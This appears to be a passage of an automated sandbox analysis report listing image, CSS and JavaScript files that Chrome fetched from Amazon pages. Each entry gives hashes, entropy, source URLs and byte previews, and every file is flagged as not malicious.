                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3................................................................,....;N...7u...{(.>>.'....xy.a....o{X.....x..{K..o..^.....y.{..=.x....'..._....-.Q. .......-].+.u.\.Fu0.e..B..\q....q....z..2X.2....H....]..I........... ..+s%XJ%X....*=.9...~..sg.<...........!8.........,.[-.%.3X...h9V...N.Lv.m.'..qy.N....X..:.'4.G.p...........pH.{.....w.N.;..sS...........j.*V.n.w..c..>..y.\.dq...]$..F.Z...k.mf.V.%..Z.3.....6..[..mK.k"m...S7.<.pux`......,.BpW9..Z..z..|W[.=I'M}$.Y.[.E.is.q.....w..q.Z......sJ.......-].;.[.mk)H.r,%.K...?L............H[..zk).J...W...s......Sg.o1.Y=.SI..ey{^...<..nd..k.R....c..".q.fZ.B..9............Z.h....".C.sN...\.[.sf..S67...;<.u%.V.W.Z..#*.b..B...B.........n.m.L...............T..|.....W:X.l7aW2......9.1.C.Y.....T).Ir...&8.2..S6..3.X.K?_.>..^........N...U*...\.|...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D7458%26at%3D7458%26t%3D1723469074824%26csmtags%3DbrowserQuiteMut%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7458
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 126x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9172
                                                                                                                                                                                                                                                                Entropy (8bit):7.957721765172471
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:QiujN9VTdQMGzkjVd8c2J6w2lqXNdFUPGxKOiu/a2gYyLlPQJGAb:uVTdQzz01PlqFUOxBiu/mKp
                                                                                                                                                                                                                                                                MD5:FB8D03917023C8FE0E54BC8B90668D30
                                                                                                                                                                                                                                                                SHA1:9BE7460E2579583D9B4048D9F1C08B590687E0DB
                                                                                                                                                                                                                                                                SHA-256:6994C683C28B052B96CE08D6012C6888B39A62D4697B19577333C8F5810B4D5E
                                                                                                                                                                                                                                                                SHA-512:42E314CBAEEE2B527A751878BA0282617A6F598325D3798B8AC094044C1E2AB7D010C1C8BC5639723A04EC30C12BF296F8D22C9BAAC91837138C52CE82289698
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81-cKwx9+lL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........~.."...............................................................!.."1A.2Qa.#..BRbq..$r..3S...c.%6u...................................................!1A."2Qa.q......B....b.............?...4h..>(.ZN...q.I$....cP_.2c4Ds.....&.%.%.GWd..y.gA..#.c`...D.=V...iC...G""....T#.ss.)'.T.H%....K...)R8`.......G}w.s...c{.9N....J.g.nh...g...a...-.X>(n...Z..+IIE^.......mP=3...R....Q."....B.....bU.].v........K4.-..^c_%....+...AoG$#fM.t..gL.|W[.P.k.`R-...V.2....p....vs.k.......A.2..H....~.+..Y...r@7gS.....M.eV......d^D......8#.x..i;{L../..^...Q..)Y...U...Vx6..Ha/./.OI:..."Kd^..V.uv.n......*9.!.N...Y.v.....p.`.jY+.y..E..W.5I......7...O..y).jG..O..r...Y.e?..U.i5........B%..x..?..?R..Kz9*.~..%}..!,{X$l.={...?..x,...X. vl.......:......E.8 ..w.W..0D.<..P8.O.#..m.......US.G.....c...*.6@.Q.9......W..~......F.t.z.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4343
                                                                                                                                                                                                                                                                Entropy (8bit):7.910105969959965
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TmbtbFE66jfm++yVJozJupaz7i4Z/oYeW1q6TgpDF67:qbtbe3VyzJup0i4ZRj1gpDFM
                                                                                                                                                                                                                                                                MD5:312209B764DFCEBAA32CCEE6EEDD1F29
                                                                                                                                                                                                                                                                SHA1:73067B74F112A032C91D6978BA1A60034E140029
                                                                                                                                                                                                                                                                SHA-256:7431B3E875E0F31B91BC167DA88599904C6F040F207560E776AA519AB405AEF1
                                                                                                                                                                                                                                                                SHA-512:3D3F96EDFF3BE6DAC8C01E8E2E0C0BD73F2F9AB38CF999213CBA1F7B3A29C30FC313403EDD76F6DA52C8569AF4F5BA80B4939D272C97F58930C26C786F80D387
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.."1AQ2t...#aqs......%Rr......45Td...$6BSb...CU................................................1!A.2..".QR............?.&.7....76.F.%|...3l....Nm.:..o....x.X..i:9|..V....~.@.L..Nmd?...`..]...R.3./......*,....Q.Z.t....*...H.....v....H.).[.XF....u..X..X......W....P.h.....$Y".3......2(M.j....U%...M:Q.6.+.kg...^.J.R.. .n..[i.3.d.tG..%.N.H...$c.....&.S.P.Uf....4..$.5.5X....8(..1.]....5f..Z.{k..jD++za8O.m<*.|.*.j;9Qs.6Y..[Zh.'..U.d...7} .Gx.$r+...8.+.5..L.}.o...*.lY....{.N....|.....|..3...y.......uU/$...;.........f..........[.5........h.sF_|?%..k .......Z.[..S...Q.....2.....{.P.".8..T.)W.+M.M<./Z...I.p...C^.s.j......QSB.Xt.&+.D....r......h].U..z...5of.r.....VVN.}.....B.m..2....]8.l. ..!.S.v$H..dc....w.........T.T.L...M....7Z..k2
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (15883), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15883
                                                                                                                                                                                                                                                                Entropy (8bit):4.901829863926774
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:RXEjfJ4dNiLKFshoU7TDNxEc1OfYXk8XbG6xYG5ZencqNL/VEM7TreVI1Ap8fq:o4iL9n7pQeRLTencqhNNeeAp8fq
                                                                                                                                                                                                                                                                MD5:3F78E373FF777316A021C60712907B45
                                                                                                                                                                                                                                                                SHA1:1B3184C560BA2A7CC8AED2500D71362102E0CCF6
                                                                                                                                                                                                                                                                SHA-256:B36C857C120194B76B37C9B5FF02039B4AF3654BD304EEEE8EF981EC4A89A2E2
                                                                                                                                                                                                                                                                SHA-512:87066284A8BFB6F1A3C4F4DBB9201F160F0183DB460A165A8E13886B4E0E5270BE6946327FD5521877A77790C38B3032EAA1363687FC3D880FD133ADC6965F50
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/31Mo71Q-kFL.css?AUIClients/CartD12nAssets
                                                                                                                                                                                                                                                                Preview:.dibs-ambiguous-item-info{position:relative}.dibs-ambiguous-item-label{margin-right:250px}.a-mobile .dibs-ambiguous-item-label{margin-right:0}.dibs-ambiguous-item-metadata{position:absolute;top:0;right:0;text-align:right;width:250px}.a-mobile .dibs-ambiguous-item-metadata{position:relative;text-align:left;width:auto}.dibs-spinner{position:absolute;z-index:1000}.dibs-secondary-view-status{position:fixed;top:50%;left:50%;width:100%;height:100%;z-index:100000;transform:translate(-50%,-50%);background-color:#fff;opacity:.85;background-size:cover;padding:0;margin:0;display:none}.dibs-secondary-view-status i{vertical-align:middle}.dibs-secondary-view-status-text{position:fixed;top:45%;left:50%;transform:translate(-50%,-50%)}.a-popover-loading-wrapper{position:absolute;left:50%;top:50%;margin-left:-64px;margin-top:-32px}.a-mobile .a-carousel-container.dibs-shoveler{margin:0}.dibs-shoveler-no-results div.a-carousel-left,.dibs-shoveler-no-results div.a-carousel-right{visibility:hidden}.dibs-sho
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17459
                                                                                                                                                                                                                                                                Entropy (8bit):7.909726349513089
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:f77+mxwIRtjPdtcB8Lca3lIrQxRAUKrb5XuySpyDzEZX+hdoG3IxmlQhhA7GagTG:G4JRt7Fv+rQq3YynMICG3I7Ayag83
                                                                                                                                                                                                                                                                MD5:FCA4A5FFA03EB31B746D04D46423BC3B
                                                                                                                                                                                                                                                                SHA1:E53611098CFD7634F91A8304E3B378FD9DB77CE0
                                                                                                                                                                                                                                                                SHA-256:C6DFA41129050410A0C62835D1CA32B4820F25794769726D828218ECC440B662
                                                                                                                                                                                                                                                                SHA-512:4E6D91A1C28F80FDA5FC4B36334907E52B2C16F5C7A8825A5D57228870A8936CE1BE14FEC3F529C6CE5A6A993601186702E8B01FE3780177D153E73BCD459302
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`........................<P"......A.!...Y..d.UV......................xSX...u.....xE>..V.O.Z...-...................).!.....n^^.F..}.J..,.yF\..:.......................\.{../..v.)VfM,.&y.Ds....F....R...9..VI...2)?...&...@...............M.zW..m..w.U..........N/.u..Z-..rg>./.... Sv{k.....*....Sv..\.~.I...O... ............\.......O..}./.^.k[......5..Y..uc.._..`X.(4/^...%.....d...................S`k.R...nj.l.G.R.x.~<..;..3%n.R.>....H......%...G}..Rk................u...UX..P.YlW......e...o...gd.g..oXa19{.#...}.k.$................c..5.' .N.C.d......-.[...#V..M...VJ....N..^.0.r.H?..>=I.?#.................s..)}.....ce,.d/....zY>[...${...`[.[.pc=..20....Sa..4..............b...1..Y+.-.8.....l..v9.vwx............Q........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3410
                                                                                                                                                                                                                                                                Entropy (8bit):7.619193594074733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0woVXYqDnuE31/pQ0buynj4C83HGA1ym07lfZaQm7ErWGqRCDuGB5z:TboVdy4BQ1eJ83B1ym8fNdrWBRCayz
                                                                                                                                                                                                                                                                MD5:7E787FAF1EB722AD0DA17F9A6F33A0B5
                                                                                                                                                                                                                                                                SHA1:E1E7576526CA7B6E2F6C1E652322E17633055192
                                                                                                                                                                                                                                                                SHA-256:0B0DEC14A9777B5377EB99C6B2B4CDF3B15DEFCE1267513F5B1F505AFCE2F936
                                                                                                                                                                                                                                                                SHA-512:777230B55EE93D0D3A8A14FF038F5074488D8ED7D6A2FFB8141602668409C3D273D51DF50B453BF2882CB50609F6A65883F370F581EAA2A583B775646091E8E9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.......................................u...F!'Q.I.b.u...F!'Q.I.b......!.7.Q.7/..tsm...^e......M..C.M".|..y...a..5..g.j}..t..2.T].....1.\.?....p...7..X.........h[U...`..^U.\.L...=Zu,4.|.k.<I..R......9.@..7...J/..2....X..^..v.;n|.3...g........_i.M...Y...*......w.zG-.?#.._Iy....Jt..r..h..E....9.k`.c.7.it...m...g..B........7U.J....*..k+!....:.............)7.hT.5.y.D.W-..<.......&F..`.'.5....m...L.....1Q#...O.1..c1..v=3#..t...................................................*.............................014.. !A2p#............X.qX..3.l.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.sl.6.a.U.:.C.KW.Wo..D%.?.PR).S.]9..d....@m..M.F.#G....**.:..NX.b.*..>...s9.[.....:.....%.lX....M._.....T._...1.....U.^!....#.....}}.u.ovT...b9.{d.{$../..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5643
                                                                                                                                                                                                                                                                Entropy (8bit):7.864358643933752
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:72+xCzZeYanEyL8iJJIBIkGuqP5RzZwEnKpetcpXReNjK3GFt36A64NZJuum4:7BxCYY6RJI6u05TznKUtnNOW7qGs4
                                                                                                                                                                                                                                                                MD5:1B495C1094AA339C163BE7E7F972372E
                                                                                                                                                                                                                                                                SHA1:C50629D2B9A4A520AA0DAA96FBFB882E50F11497
                                                                                                                                                                                                                                                                SHA-256:BB6ED509542D9A6EDE5BF7B1BADDF3E203698283E836F2819ED1108AFF750989
                                                                                                                                                                                                                                                                SHA-512:671683DFD700F7A506562FD99014A42BAE189F656236DBAFDD70E0229CA8C85829078141CE10D9727DFC76CAC01903650A065286069900D62F0B039021D5E03C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334873_186x116_1X_en_AE_2._SY116_CB597773556_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................7............~....WT{eW..N1...E.}..H.P.........=..J......0...i........}..T....P1........a.5......."t.`.Nr..z.v......y...Z(.......).]..$.l.Q"...v....+y...5.`6(.......tj~.S...y.+...]3E....O.b-...D..q.G...2`m.J.u..:f...;..:....==._....u.f...j..k.^..."2....UXf@.SG2^.Qg.. .....].%t.&nG`.......p...'...y.@..-.K....*......V....~.}i.................R..........................!1A....Qa...%045q......"$6D#&RTUe.2BPbu... (@EFdv.............?.....0.[.v.....$\\_..v......L......u.}..v.g.)UH..s...9..?k.f.d52..i.H.s$......,.n|.QH....N........U.../*..8JU.N.......:._.ak8.."P9T........T..;..f..*.4.LY(......p.....[M;pk...+..jBp.#v.._.$.G..K....U.D......G.JhE'.._h|q@.;TRz.3`.5.....'xI.."......O...H........n..V.V..>.".u.....CI..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3683
                                                                                                                                                                                                                                                                Entropy (8bit):7.886967941667832
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tub5TVK4X7US27UhX/eoOBcNabXh272dDargBL3:cVKZUhGoOJbXm2dDae
                                                                                                                                                                                                                                                                MD5:640A6E540E1654D38233E241CF9E5BB8
                                                                                                                                                                                                                                                                SHA1:54E38D3943E7C96E561F50C671AFE7BF013787B3
                                                                                                                                                                                                                                                                SHA-256:FD65AFEEA50B63AC6324BB7851EBDB046C968A9CC76883100630A1FBAE50C21A
                                                                                                                                                                                                                                                                SHA-512:2078105EF27F11C11000351646B684F1C02D5DBC52C7002EBE939E2526524D1EF9527A419C14607E0F10CD92C6D0566230F0354BA9C4B236D222037CCFF11CEA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_toys-bau-qc-2322-372x232-b07nbr59qv_372x232_ae-en._SY116_CB627396612_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."............................................................!.1.."Q2Aq.a...3....#BRr.........................................................!1...AQ.2aq....."#...............?...D.............2....C....e..S.!H3..+Z.......?.0...r..bd.%.....u..!#O.....$DB$DB$DB$DB$DB$DB$DB$DB$DB.....j.EM`...W....\.....j.....O.N9...r.Y..(....`?.6.....}3..l....Y.:.hB...nA....<.-.He.G]...q.k.<......x.s.2...pn...U.[. ..0I.L.<.....k%nG.P0....R.U...9.T...D.......F.q.\..$.1.9ckCt.."'z.H..H..H..H..H..H..H..H..H....Z^.m...B0....9V=....}4.|....g9..^'.i.-....m9....C..>..o:......F-FU`@nQ.[.m.c2.Q...E..y.XPU..[.....,.v....M/K..,s.nC.............,n..M...b...cN..SK....Sy..}....>..@.....m]R...]UyH..+...e..X....Sa.w.......XEb.A..g....~.R.........:~...pN2....c.4....u..S.=%C.u..gg.h&K...Zt.......;T.....{....;ds.t..;..I..>%..`.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (24182), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):24182
                                                                                                                                                                                                                                                                Entropy (8bit):5.315032386425423
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Tvn/4G//y4q6IDB5yqO7RH3+o1EXt/CHoOP28BOzJjTbhYcG9LN1VV1XrLcMu3i1:T3XxL1awZgzJbhTGtZcMLzZ6gD23Uj
                                                                                                                                                                                                                                                                MD5:1D6DBC0AA536245BD1B35B964F94E01A
                                                                                                                                                                                                                                                                SHA1:A428BBA0D959C3D78F7DFE6307C5EDE5F1D8AA54
                                                                                                                                                                                                                                                                SHA-256:38D0C94882C0FA40B0030F9564BAE92D902F657DFB954CFA6B53B1BFA083ECFE
                                                                                                                                                                                                                                                                SHA-512:10E0D7982B54660203A46C5DF1B3DAB2C6EE6E379BE9903B11DDAA3ADA92DA355FC8C182B9D742AC5F4DBC71812891798D3F28028746D820A16016A1073E60F5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.r=function(t){Object.defineProperty(t,"__esModule",{value:!0})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=77)}([function(t,e,n){"use strict";n.r(e);var r="undefined"!=typeof MSFClient&&MSFClient;e.default=r},function(t,e,n){"use strict";var r=n(0),o="undefined"!=typeof navigator&&navigator,i=r.default&&r.default.getUserAgentInfo()||o&&o.userAgent;e.a=i},function(t,e,n){"use strict";n.r(e);var r=n(0),o=n(7),i=function(){if(r.default){var t=r.default.getDocumentCookie();return/\"av\":\"([.\d]*)\"/i.test(Object(o.a)(t,"amzn-app-ctxt"))}return!1}();e.default=i},f
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3783
                                                                                                                                                                                                                                                                Entropy (8bit):7.892597719362774
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TgfIdu08P9yj70Rp8i+jxwJTDAJbeXaLrkerYVtI3DJURa:xdg8jq+t2X6b5rYVtsJURa
                                                                                                                                                                                                                                                                MD5:479684630CACC4A318DB9991B11BE386
                                                                                                                                                                                                                                                                SHA1:8A290D73EEBB2164B6CCDA03A05CE5F218AE8172
                                                                                                                                                                                                                                                                SHA-256:537C0F8FFE5BB82F4F291B491DC57C5316EAD76088AC3DEF116B08957BF763E3
                                                                                                                                                                                                                                                                SHA-512:702287AECFEEA7DB21AC5C6079C047D1AFB6F8FE6B5FC1BFBDE9E2296581B5CB8097C4D458FCDF9CC71DF2D27F3411819DE518D7C69C4794E6FC1D526B8CFA1F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1.2Qa"Aq.....Br..RSb...#3CDT.....Uc.....................................................!."A1.............?..-z....b..I.......j.$U..q..{..,.$.n.....U......z.@.#....*.....iy...."7pyS.uV.jn.^E-..p>F.Z#]B./...rv....Z...{....F..|G....*fF>5.6......r b...N...>..?..%*.EG...d..&A...i.g.....4$......I.......u_.....h*..W........u..j....b....H.j<.@.G*..E...)....~.u_Q..j..q....5....].W_.#/..;.$..fo....W._G!..P...X.>..I..7...r......-.x>..p*1.P..*...V......Sy....u......K.......^.......E.t......u.k.kz].....M..+..H.g.H.!..k.......!....].u.=............N...o..*.Tm.p).d...Ed$.....*...X'.....CR.98F+.$.}../;..v._%4.J.eP..%.....s..3.k=GJ...3'.;...Gj....[..n.{B..p@.Z............R.)....*.P.?..q.D%.z...R>.n{...Fd.....U.b.".8.N.@.S.v.E..B.b.x.>x.&.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3666
                                                                                                                                                                                                                                                                Entropy (8bit):7.873527763908782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TpNSbkfVh8D6Qpec8BLTzHKjppGoyY/0ffLDcI3uQ:mbkdh8Fz8BDHGGoytff3Z5
                                                                                                                                                                                                                                                                MD5:CB90CEAF2C3C467F5DFEE05954CEB900
                                                                                                                                                                                                                                                                SHA1:E99C4DD7CF8CC9B90619711EAA8AC6CC3C51D735
                                                                                                                                                                                                                                                                SHA-256:FBCF8C42C175FF7CA54B6F2D8CD92CC23703238862BBEF2692605E267603AD4E
                                                                                                                                                                                                                                                                SHA-512:F312E2AC22D7DD59D6A778DA29C56944A62A962C87F7DA01444894A692D843B9536A9530CC308A2A06B8B0EF56942306A06F53CD5BED6EE9722556A8BB5054FA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!12a..QRq..."3ASr...B.....#$CDb..4T.................................................1AaQ............?..-..G..Q.%.*4.E..V...U.ll.x..j..+.U....0.....EY..........:...QT.}..x}.CA...xA..._]S...]&.....R..p....M..g.OYl...\.`......|$b.}L.l..k_.....3.~..j...N.g.....D@DD.D@DD.D@DD.D@U7hT... ........G..Q.%.*4....9.6........:.*t....jB~.t...T. ....m...U....w=..$....O5.G..........5..................M..*...&DD.D@DD..TjI5.G..J..-/.`~..2..AN.......HCX.K.u...J.!.PVcx...Z..D.....?. ..S)AJ.F.CJ0...-.fo....q.\lQb._'..J+JE.8.`=$5.a+.mA[.#O.T............R..V....D.....'..i'....c........~..(*DD.D@DD.D@DD.Sv.J..B.........._F0....W9.z..?k......=..@....b......u...ZY_<.}CD.9..\.e.....R..a7m.#U..Wp-...pF..u.....d..0....].......;.;.U....w....=S..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9532
                                                                                                                                                                                                                                                                Entropy (8bit):7.92274011992499
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:X0cVWHfD3ZHE+oVN4HSJagGfIxWc6Vcjt4LZz1Q+0PaBiCZumt+bUcu:Xh0HfxWOSsgm7caGAZKTaBp8bq
                                                                                                                                                                                                                                                                MD5:DA6E7FBC0052825D4F8B2FA75ECA9B2B
                                                                                                                                                                                                                                                                SHA1:2341A57EC7DF80A64C34B000F58E3EE9FF0BE7E2
                                                                                                                                                                                                                                                                SHA-256:1663D553953829751E1C6F62A27D944289D73367E9EFB51235CC53BFDDB828DB
                                                                                                                                                                                                                                                                SHA-512:5CC3F5BBB34A820575A88D4B2EAC4A66C7580D8D0F349971528E53D72CA4968C701A7C33F8C892AA5B523F60FC6B7DA984E4DD5DEBC94A98D0E816B27D639F61
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41WmXJZiubL._SR240,220_.jpg"
